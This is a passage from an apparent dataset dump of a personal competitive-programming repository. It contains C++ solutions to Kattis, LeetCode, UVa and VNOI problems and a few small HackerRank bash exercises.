"num_lines": 37,
"path": "/katis/closestsums.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n\r\nconst int NMAX = 1e3 + 3;\r\n\r\nint n, m, a[NMAX];\r\n//----------------------------------------\r\nstring process(int u) {\r\n int re = 2e9;\r\n rep(i, 1, n)\r\n rep(j, i + 1, n) \r\n if (abs(a[i] + a[j] - u) < abs(re - u)) re = a[i] + a[j];\r\n\r\n return to_string(re);\r\n}\r\n//----------------------------------------\r\nint main() {\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n freopen(\"test.inp\", \"r\", stdin);\r\n\r\n int testCase = 0, u;\r\n while (cin >> n) {\r\n testCase += 1;\r\n cout << \"Case \" + to_string(testCase) + \":\" << endl;\r\n rep(i, 1, n) cin >> a[i];\r\n cin >> m;\r\n while (m--) {\r\n cin >> u;\r\n cout << \"Closet sum to \" + to_string(u) + \" is \" + process(u) + \".\" << endl;\r\n }\r\n }\r\n}"
},
{
"alpha_fraction": 0.40449437499046326,
"alphanum_fraction": 0.47191011905670166,
"avg_line_length": 10,
"blob_id": "896ed4d2f677e327137216169a66f33f3cdd5870",
"content_id": "4a04183a16a274d84fffe6b758eb25fa4fe91198",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 8,
"path": "/bash/hackerrank/loop_skip.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "for i in {1..100}\ndo\n\tif [[ $(( $i % 2 )) -eq 0 ]] \n\tthen \n\t\tcontinue\n\tfi\n\techo $i\ndone\t\n"
},
{
"alpha_fraction": 0.45344826579093933,
"alphanum_fraction": 0.4543103575706482,
"avg_line_length": 23.1875,
"blob_id": "da5bf10fb90a6175443b49e3b6c6ec2ffecda6cc",
"content_id": "13620a98c1e72d33c75384420f4d9b299404a685",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1160,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 48,
"path": "/leetcode/23.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nstruct ListNode {\n int val;\n ListNode *next;\n ListNode(): val(0), next(nullptr) {}\n ListNode(int x): val(x), next(nullptr) {}\n ListNode(int x, ListNode *next): val(x), next(next) {}\n};\n\nclass Solution {\n public:\n ListNode* swapPairs(ListNode* head) {\n if (!head || !head -> next) return head;\n\n ListNode *start = nullptr, *prev = nullptr, *first = nullptr, *second = nullptr;\n\n while (head) {\n if (head -> next) {\n first = head;\n second = head -> next;\n head = head -> next -> next;\n second -> next = first;\n } else {\n second = head;\n first = nullptr;\n head = head -> next;\n }\n\n if (prev)\n prev -> next = second;\n else\n start = second;\n prev = first;\n }\n if (first)\n first -> next = nullptr;\n else\n second -> next = nullptr;\n return start;\n }\n};\n\nint main() {\n Solution a = Solution();\n cout << \"Hello world\";\n}"
},
{
"alpha_fraction": 0.3351498544216156,
"alphanum_fraction": 0.35013625025749207,
"avg_line_length": 18.44444465637207,
"blob_id": "8add40c894fbf1d92f8caa758cd839e0944f20f4",
"content_id": "91ce1354d4637f40f7ae4bf05c102f30c2edb227",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 734,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 36,
"path": "/katis/subseqhard.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define ll long long\r\n\r\nint n;\r\nmap<ll, int> m;\r\n\r\n//----------------------------------------\r\nvoid process() {\r\n int u; ll s = 0, res = 0;\r\n cin.ignore();\r\n m.clear();\r\n m[0] = 1;\r\n cin >> n;\r\n rep(i, 1, n) {\r\n cin >> u;\r\n s += u;\r\n if (m.find(s - 47) != m.end()) \r\n res += m[s - 47];\r\n m[s] = m.find(s) == m.end() ? 1 : m[s] + 1;\r\n }\r\n\r\n cout << res << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n int test;\r\n cin >> test;\r\n while (test--) {\r\n cin.ignore();\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.4528301954269409,
"alphanum_fraction": 0.49056604504585266,
"avg_line_length": 12.25,
"blob_id": "fcd6b2c5c2d11e62e4c828696528f581e8a6ff68",
"content_id": "c3e38be62424f5441ab6aa03fa48acd62766da50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 8,
"path": "/bash/hackerrank/paste.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#paste1\npaste -s -d ';'\n#paste2\npaste - - - -d ';'\n#paste3\npaste -s -d $'\\t'\n#paste4\npaste - - - -d $'\\t'\n"
},
{
"alpha_fraction": 0.361328125,
"alphanum_fraction": 0.3932291567325592,
"avg_line_length": 24.517240524291992,
"blob_id": "029cd23c81576e93340a4fdf590bf9dfcfe1e368",
"content_id": "d27adb04b44b4c761772d676db00e0197a466095",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1536,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 58,
"path": "/katis/walls.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n\r\ntypedef pair<float, float> point;\r\nfloat l, w, r;\r\nint n, cover[33];\r\npoint walls[4];\r\nset<int> s;\r\n//----------------------------------------\r\nvoid openf() {\r\n float px, py;\r\n cin >> l >> w >> n >> r;\r\n walls[0] = point(-l/2, 0);\r\n walls[1] = point(l/2, 0);\r\n walls[2] = point(0, -w/2);\r\n walls[3] = point(0, w/2);\r\n\r\n rep(i, 0, n - 1) {\r\n cin >> px >> py;\r\n cover[i] = 0;\r\n rep(j, 0, 3) {\r\n //cout << (pow(px - walls[j].first, 2) + pow(py - walls[j].second, 2)) << endl;\r\n if (pow(px - walls[j].first, 2) + pow(py - walls[j].second, 2) <= r * r)\r\n cover[i] += (1 << j);\r\n }\r\n \r\n //cout << i << \" \" << cover[i] << endl;\r\n }\r\n\r\n int res = 5;\r\n rep(i1, 0, n - 1)\r\n rep(i2, 0, n - 1)\r\n rep(i3, 0, n - 1)\r\n rep(i4, 0, n - 1) {\r\n s.clear();\r\n s.insert(i1); s.insert(i2); s.insert(i3); s.insert(i4);\r\n if ((cover[i1] | cover[i2] | cover[i3] | cover[i4]) == 15) {\r\n res = min(res, int(s.size()));\r\n }\r\n }\r\n\r\n if (res == 5) cout << \"Impossible\"; else cout << res;\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.39349377155303955,
"alphanum_fraction": 0.4126559793949127,
"avg_line_length": 24.0930233001709,
"blob_id": "75b5a3f5e60dbf9b950c428b33bfdf0375c8fe59",
"content_id": "608371f16e0be81aa2332a6381bcff4a97dc112a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2244,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 86,
"path": "/vnoi/pvoi14_1.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n#define iterate(x, z) for (auto x:z)\r\n#define decon(a) show(a); for (auto x: a) cout << x << \" \"; cout << endl\r\n#define debug(x) show(x); cout << x << \" \" << endl;\r\n#define dearr(a, n) show(a); for (int i = 1; i <= n; i++) cout << a[i] << \" \"; cout << endl\r\n#define show(a) cout << #a << \": \"\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\nconst int oo = 1e9 + 3;\r\nstruct Edge {\r\n int u, v, cost;\r\n Edge(int tu, int tv, int tcost) {\r\n u = tu; v = tv; cost = tcost;\r\n }\r\n};\r\n\r\ntypedef complex<double> point;\r\n\r\nconst int NMAX = 1e5 + 3;\r\n\r\nint n, m;\r\nvector<int> ds[NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n cin >> n;\r\n int u, v;\r\n\r\n int right = 2 * oo;\r\n int up = 2 * oo;\r\n int left = -2 * oo; \r\n int down = -2 * oo;\r\n rep(rec, 1, n) {\r\n int left_r = 2 * oo;\r\n int right_r = -2 * oo;\r\n int up_r = -2 * oo;\r\n int down_r = 2 * oo;\r\n rep(i, 1, 4) {\r\n cin >> u >> v;\r\n left_r = min(left_r, v - u);\r\n right_r = max(right_r, v - u);\r\n up_r = max(up_r, u + v);\r\n down_r = min(down_r, u + v);\r\n }\r\n left = max(left, left_r);\r\n right = min(right, right_r);\r\n up = min(up, up_r);\r\n down = max(down, down_r);\r\n }\r\n\r\n\r\n left += 1; right -= 1; down += 1; up -= 1;\r\n\r\n //debug(left); debug(right); debug(up); debug(down);\r\n if (left > right || down > up) {\r\n cout << 0;\r\n return;\r\n } \r\n\r\n ll tu = ((right - abs(right) % 2) - (left + abs(left) % 2)) / 2 + 1;\r\n ll tv = ((up - abs(up) % 2) - (down + abs(down) % 2)) / 2 + 1;\r\n \r\n //debug(tu);\r\n //debug(tv);\r\n\r\n ll res = tu * tv;\r\n res += (ll)(right - left + 1 - tu) * (up - down + 1 - tv);\r\n\r\n cout << res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n openf();\r\n process();\r\n}\r\n"
},
{
"alpha_fraction": 0.5114753842353821,
"alphanum_fraction": 0.5180327892303467,
"avg_line_length": 21.615385055541992,
"blob_id": "7e078126ddfe46076a661c3d038d2d77d4dbfa81",
"content_id": "8c8f23ad7709622ebe8dc8f5dcfc5afdbb2f7b2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 305,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 13,
"path": "/katis/cold.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#define fori(i, a, b, c) for (int i=a; i <= b; i += c)\r\n#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nint main() {\r\n int numberOfDays, tempInDay, res = 0;\r\n cin >> numberOfDays;\r\n while (numberOfDays--) {\r\n cin >> tempInDay;\r\n res += (tempInDay < 0);\r\n }\r\n cout << res;\r\n}"
},
{
"alpha_fraction": 0.44948065280914307,
"alphanum_fraction": 0.45467421412467957,
"avg_line_length": 28.43055534362793,
"blob_id": "e3c6d851ca7c22a38204ffb652cb4fe2b9a6fbec",
"content_id": "d564edafbd80ba44cae69ef916871433498fc004",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2118,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 72,
"path": "/uva/230.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\ntypedef pair<string, string> pss;\n\nset<pss> set_book_shelved;\nset<pss> set_book_borrwed;\nset<pss> set_book_returned;\nmap<string, string> m;\n\nvoid openf() {\n freopen(\"test.inp\", \"r\", stdin);\n freopen(\"test.out\", \"w\", stdout);\n string s;\n while (getline(cin, s)) {\n if (s == \"END\")\n break;\n int ind = s.find('\"', 1);\n m[s.substr(0, ind + 1)] = s.substr(ind + 4);\n set_book_shelved.insert(make_pair(s.substr(ind + 4), s.substr(0, ind + 1)));\n }\n}\n\nvoid process() {\n string s;\n while (getline(cin, s)) {\n if (s == \"END\") {\n return;\n }\n\n string book_name;\n pss book;\n if (s[0] != 'S') {\n book_name = s.substr(7);\n book = make_pair(m[book_name], book_name);\n }\n //Borrow\n if (s[0] == 'B') {\n set_book_shelved.erase(book);\n set_book_borrwed.insert(book);\n }\n //Return\n else if (s[0] == 'R') {\n set_book_borrwed.erase(book);\n set_book_returned.insert(book);\n } else { //Shelve\n while (!set_book_returned.empty()) {\n book = *set_book_returned.begin();\n set_book_returned.erase(book);\n if (set_book_shelved.empty()) {\n cout << \"Put \" << book.second << \" first\" << endl;\n } else {\n auto before_book = set_book_shelved.lower_bound(book);\n if (before_book == set_book_shelved.begin()) \n cout << \"Put \" << book.second << \" first\" << endl;\n else \n cout << \"Put \" << book.second << \" after \" << (*(--before_book)).second << endl;\n }\n set_book_shelved.insert(book);\n }\n cout << \"END\" << endl;\n }\n }\n}\nint main() {\n openf();\n process();\n}"
},
{
"alpha_fraction": 0.4098360538482666,
"alphanum_fraction": 0.41530054807662964,
"avg_line_length": 20.040000915527344,
"blob_id": "bebc29cf91e2a30d954aa203616a0eab6ee484df",
"content_id": "a87f34835d7d0f8836ef72cb9d6c383a47ce93cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 549,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 25,
"path": "/katis/anothercandies.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nint n;\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n int testCase;\r\n ll u, tmp;\r\n cin >> testCase;\r\n while (testCase--) {\r\n cin >> n; \r\n tmp = 0;\r\n rep(i, 1, n) {\r\n cin >> u;\r\n tmp = (tmp + u % n) % n; \r\n }\r\n if (tmp == 0) cout << \"YES\"; else cout << \"NO\";\r\n\r\n cout << endl;\r\n }\r\n}"
},
{
"alpha_fraction": 0.3644510805606842,
"alphanum_fraction": 0.3786407709121704,
"avg_line_length": 23.788461685180664,
"blob_id": "8698d5db3a81923890614b8e544c6a78637e059c",
"content_id": "2d6716d0395b8a6592c305852bfd213d2766b553",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1339,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 52,
"path": "/vnoi/chesscbg.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nvector<pair<int, int>> pa, pb;\r\nvector<int> perm;\r\n//----------------------------------------\r\nvoid openf() {\r\n char ch;\r\n rep(i, 1, 4)\r\n rep(j, 1, 4) {\r\n cin >> ch;\r\n if (ch == '1') {\r\n pa.push_back(make_pair(i, j));\r\n //cout << i << \" \" << j << endl;\r\n }\r\n }\r\n\r\n rep(i, 1, 4)\r\n rep(j, 1, 4) {\r\n cin >> ch;\r\n if (ch == '1') {\r\n //cout << i << \" \" << j << endl;\r\n pb.push_back(make_pair(i, j));\r\n } \r\n }\r\n}\r\n//----------------------------------------\r\nvoid process() { \r\n rep(i, 0, 7) perm.push_back(i);\r\n int res = 1e6;\r\n do {\r\n int cnt = 0;\r\n //rep(i, 0, 7) cout << perm[i] << \" \";\r\n //cout << endl;\r\n rep(i, 0, 7) \r\n cnt += abs(pa[perm[i]].first - pb[i].first) + abs(pa[perm[i]].second - pb[i].second);\r\n res = min(res, cnt);\r\n } while (next_permutation(perm.begin(), perm.end()));\r\n cout << res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n openf();\r\n process();\r\n}"
},
{
"alpha_fraction": 0.380352646112442,
"alphanum_fraction": 0.3992443382740021,
"avg_line_length": 36.80952453613281,
"blob_id": "de0c624f1efe087ca2b470613b2d7468779dd933",
"content_id": "822b4d93bd33e92878c99e7b02edfa8962f63b69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1588,
"license_type": "no_license",
"max_line_length": 371,
"num_lines": 42,
"path": "/leetcode/36.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <vector>\n#include <algorithm>\n#include <iostream>\nusing namespace std;\n\nclass Solution {\npublic:\n bool isASetValid(vector<char>& s) {\n vector<int> filtered_s;\n copy_if(s.begin(), s.end(), back_inserter(filtered_s), [](char x) { return x != '.'; });\n sort(filtered_s.begin(), filtered_s.end());\n auto newSize = unique(filtered_s.begin(), filtered_s.end());\n return newSize == filtered_s.end();\n }\n bool isValidSudoku(vector<vector<char>>& board) {\n for (auto i = 0; i < 9; i++) {\n vector<char> row;\n for (auto j = 0; j < 9; j++)\n row.push_back(board[i][j]);\n if (!isASetValid(row)) return false;\n\n vector<char> col;\n for (auto j = 0; j < 9; j++)\n col.push_back(board[j][i]);\n if (!isASetValid(col)) return false;\n\n vector<char> square;\n for (auto j = 0; j < 9; j++) {\n square.push_back(board[(i / 3 * 3) + (j / 3)][(i % 3 * 3) + (j % 3)]);\n }\n if (!isASetValid(square)) return false;\n }\n return true;\n }\n};\n\nint main() {\n vector<vector<char>> x {{'.','.','.','.','5','.','.','1','.'},{'.','4','.','3','.','.','.','.','.'},{'.','.','.','.','.','3','.','.','1'},{'8','.','.','.','.','.','.','2','.'},{'.','.','2','.','7','.','.','.','.'},{'.','1','5','.','.','.','.','.','.'},{'.','.','.','.','.','2','.','.','.'},{'.','2','.','9','.','.','.','.','.'},{'.','.','4','.','.','.','.','.','.'}};\n\n Solution a = Solution();\n cout << a.isValidSudoku(x);\n}\n"
},
{
"alpha_fraction": 0.4439403712749481,
"alphanum_fraction": 0.45560595393180847,
"avg_line_length": 24.18644142150879,
"blob_id": "e91afc70759caae8cd5f20e896c9fb9f1951910f",
"content_id": "4124be3de628cb41a26dbff41354038324cd291e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1543,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 59,
"path": "/katis/simpleaddition.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nconst int BASE = 1e9;\r\nconst int scs = 9;\r\n\r\ntypedef vector<int> BigInt;\r\n//----------------------------------------\r\nBigInt stringToBigInt(string s) {\r\n BigInt res;\r\n res.clear();\r\n\r\n int i = s.length() - 1;\r\n while (i >= 0) {\r\n int j = max(i - scs + 1, 0);\r\n res.push_back(stoi(s.substr(j, i - j + 1)));\r\n i = j - 1;\r\n }\r\n\r\n return res;\r\n}\r\n//----------------------------------------\r\nvoid printBigInt(BigInt a) {\r\n for (auto x = a.rbegin(); x != a.rend(); x++) {\r\n if (x == a.rbegin()) cout << *x;\r\n else {\r\n string temp = to_string(*x);\r\n while (temp.length() < scs) temp = '0' + temp;\r\n cout << temp;\r\n }\r\n }\r\n cout << endl;\r\n}\r\n//----------------------------------------\r\nBigInt addBigInt(BigInt firstNumber, BigInt secondNumber) {\r\n BigInt res;\r\n res.clear();\r\n\r\n int carry = 0;\r\n for (auto i = 0; i < max(firstNumber.size(), secondNumber.size()); i++) {\r\n auto val1 = i < firstNumber.size() ? firstNumber[i]:0;\r\n auto val2 = i < secondNumber.size() ? secondNumber[i]:0;\r\n auto tmp = (val1 + val2 + carry);\r\n res.push_back(tmp % BASE);\r\n carry = tmp / BASE;\r\n }\r\n\r\n return res;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n string s;\r\n cin >> s;\r\n auto firstNumber = stringToBigInt(s);\r\n cin >> s;\r\n auto secondNumber = stringToBigInt(s);\r\n\r\n printBigInt(addBigInt(firstNumber, secondNumber));\r\n}"
},
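The BigInt code above packs nine decimal digits (base 10^9) into each vector element, least-significant limb first, which is why printBigInt zero-pads every limb after the most significant one. A tiny self-contained illustration of that layout (the number is invented for the example):

```
#include <cstdio>
#include <vector>
using namespace std;

int main() {
    // "12345678901234567" as base-1e9 limbs, least significant first:
    vector<int> big = {901234567, 12345678};
    printf("%d%09d\n", big[1], big[0]);  // prints 12345678901234567
}
```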
{
"alpha_fraction": 0.7948718070983887,
"alphanum_fraction": 0.7948718070983887,
"avg_line_length": 17.5,
"blob_id": "fcdfa32dd6c799cabe06840287086442054556c5",
"content_id": "caa17ea4586534fc7a38cdf6a7a42e069592e522",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 39,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "# CP\r\nCompettive Programming problems\r\n"
},
{
"alpha_fraction": 0.5370610952377319,
"alphanum_fraction": 0.5461638569831848,
"avg_line_length": 28.576923370361328,
"blob_id": "ddf966845f6bf1f0876b4e69797501badb534965",
"content_id": "06566d4cf39019665d2408d4e51160a4d3a89d7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 26,
"path": "/leetcode/34.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <vector>\n\nusing namespace std;\n\nclass Solution {\n public:\n vector<int> searchRanges(vector<int>& nums, int target) {\n auto first = lower_bound(nums.begin(), nums.end(), target);\n auto last = upper_bound(nums.begin(), nums.end(), target);\n auto firstIndex = first - nums.begin();\n auto lastIndex = last - nums.begin() - 1;\n vector<int> res;\n res.push_back(firstIndex > lastIndex ? -1 : firstIndex);\n res.push_back(firstIndex > lastIndex ? -1 : lastIndex);\n return res;\n }\n};\n\nint main() {\n Solution x = Solution();\n vector<int> v { 1, 2, 3 };\n auto res = x.searchRanges(v, 2);\n for (auto x: res)\n cout << x << \" \";\n}\n"
},
{
"alpha_fraction": 0.43020594120025635,
"alphanum_fraction": 0.43249428272247314,
"avg_line_length": 19.950000762939453,
"blob_id": "8b1af75c79b9feba01ccfac3e2f48444199c44f4",
"content_id": "c5913013e6c252fa504b5fd187e7fd32972c310d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 437,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 20,
"path": "/vnoi/template.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nint n, res = 0;\r\nvector<int> a;\r\n//----------------------------------------\r\nvoid process() {\r\n\r\n}\r\n//----------------------------------------\r\nint main() {\r\n freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n}"
},
{
"alpha_fraction": 0.4566297233104706,
"alphanum_fraction": 0.46923959255218506,
"avg_line_length": 26.467391967773438,
"blob_id": "2748cb52eb8fdaa67391f7aad2a5b3563dbb8515",
"content_id": "47c10e2b1302e40d1e3ffac0eef8d8fd7850d3a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2617,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 92,
"path": "/vnoi/lem.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n#define iterate(x, z) for (auto x:z)\r\n#define decon(a) show(a); for (auto x: a) cout << x << \" \"; cout << endl\r\n#define debug(x) show(x); cout << x << \" \" << endl;\r\n#define dearr(a, n) show(a); for (int i = 1; i <= n; i++) cout << a[i] << \" \"; cout << endl\r\n#define show(a) cout << #a << \": \"\r\n#define fi first\r\n#define se second\r\n\r\nconst int dx[4] = {-1, 0, 1, 0};\r\nconst int dy[4] = {0, 1, 0, -1};\r\nconst int oo = 1e9 + 3;\r\ntypedef complex<double> Point;\r\nstruct Edge {\r\n int u, v, cost;\r\n Edge(int tu, int tv, int tcost) {\r\n u = tu; v = tv; cost = tcost;\r\n }\r\n};\r\nstruct Line {\r\n Point first, second;\r\n bool isLine;\r\n Line(Point tfirst, Point tsecond, bool tisLine=true) {\r\n first = tfirst; second = tsecond; isLine = tisLine;\r\n }\r\n};\r\n\r\n\r\nconst int NMAX = 1e3 + 3;\r\n\r\nint n, m;\r\nPoint a[NMAX], b[NMAX];\r\n//----------------------------------------\r\nvoid openf() {\r\n double u, v;\r\n cin >> n >> m;\r\n rep(i, 1, n) {\r\n cin >> u >> v;\r\n a[i] = Point(u, v);\r\n }\r\n rep(i, 1, m) {\r\n cin >> u >> v;\r\n b[i] = Point(u, v);\r\n }\r\n}\r\n//----------------------------------------\r\ndouble dotProduct(Point PointA, Point PointB) {\r\n return real(PointA) * real(PointB) + imag(PointA) * imag(PointB);\r\n}\r\n//----------------------------------------\r\nPoint getClosestPoint(Point pointA, Line line) {\r\n if (line.isLine) {\r\n if (dotProduct(line.fi - line.se, pointA - line.fi) > 0) return line.fi;\r\n if (dotProduct(line.se - line.fi, pointA - line.se) > 0) return line.se;\r\n }\r\n\r\n double t = dotProduct(line.se - line.fi, pointA - line.fi) / norm(line.se - line.fi);\r\n return line.fi + t * (line.se - line.fi);\r\n}\r\n//----------------------------------------\r\ndouble getDistance(Point pointA, Line line) {\r\n auto closestPoint = getClosestPoint(pointA, line);\r\n return abs(closestPoint - pointA);\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n double res = 1e10;\r\n rep(i, 1, n) {\r\n rep(j, 1, m - 1)\r\n res = min(res, getDistance(a[i], Line(b[j], b[j + 1])));\r\n }\r\n\r\n rep(i, 1, m)\r\n rep(j, 1, n - 1)\r\n res = min(res, getDistance(b[i], Line(a[j], a[j + 1])));\r\n\r\n printf(\"%.3lf\", res);\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n openf();\r\n process();\r\n}"
},
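getClosestPoint above projects a point onto a segment with the scalar t = dot(B - A, P - A) / |B - A|^2 and clamps t to the endpoints before measuring distance. The same computation with plain structs instead of std::complex, as a self-contained sketch (function and type names are illustrative):

```
#include <algorithm>
#include <cmath>
#include <cstdio>

struct Pt { double x, y; };

// Distance from p to segment ab: clamp the projection parameter to [0, 1].
double distPointSegment(Pt p, Pt a, Pt b) {
    double dx = b.x - a.x, dy = b.y - a.y;
    double len2 = dx * dx + dy * dy;
    double t = len2 > 0 ? ((p.x - a.x) * dx + (p.y - a.y) * dy) / len2 : 0.0;
    t = std::max(0.0, std::min(1.0, t));           // stay on the segment
    double cx = a.x + t * dx, cy = a.y + t * dy;   // closest point on ab
    return std::hypot(p.x - cx, p.y - cy);
}

int main() {
    printf("%.3f\n", distPointSegment({0, 1}, {-1, 0}, {1, 0}));  // 1.000
}
```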
{
"alpha_fraction": 0.4784768223762512,
"alphanum_fraction": 0.4933774769306183,
"avg_line_length": 22.269229888916016,
"blob_id": "a27765ebed78824220455412114087b35c956690",
"content_id": "1250ab7a9b1504be30d62e71a27c9406640b2ea1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 604,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 26,
"path": "/leetcode/55.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\n#define rep(i, a, b, step) for (auto i = a; i < b; i += step)\n#define repr(i, a, b, step) for (auto i = a; i > b; i -= step)\n\ntypedef pair<int, int> pii;\n\nclass Solution {\n public:\n bool canJump(vector<int>& nums) {\n int maxJump = 0;\n rep(i, 0, nums.size(), 1) {\n if (i > maxJump)\n break;\n maxJump = max(maxJump, i + nums[i]);\n }\n return (maxJump >= nums.size() - 1);\n }\n};\n\nint main() {\n Solution a = Solution();\n vector<int> x = { 2, 3, 1, 1, 4 };\n cout << a.canJump(x);\n}"
},
{
"alpha_fraction": 0.41845017671585083,
"alphanum_fraction": 0.4339483380317688,
"avg_line_length": 27.25,
"blob_id": "5c83a4b97ad2895c0b1d2469218f926b9aa0195c",
"content_id": "4a65ca3727d02fb24cbd98fb7256169833d7b63c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1355,
"license_type": "no_license",
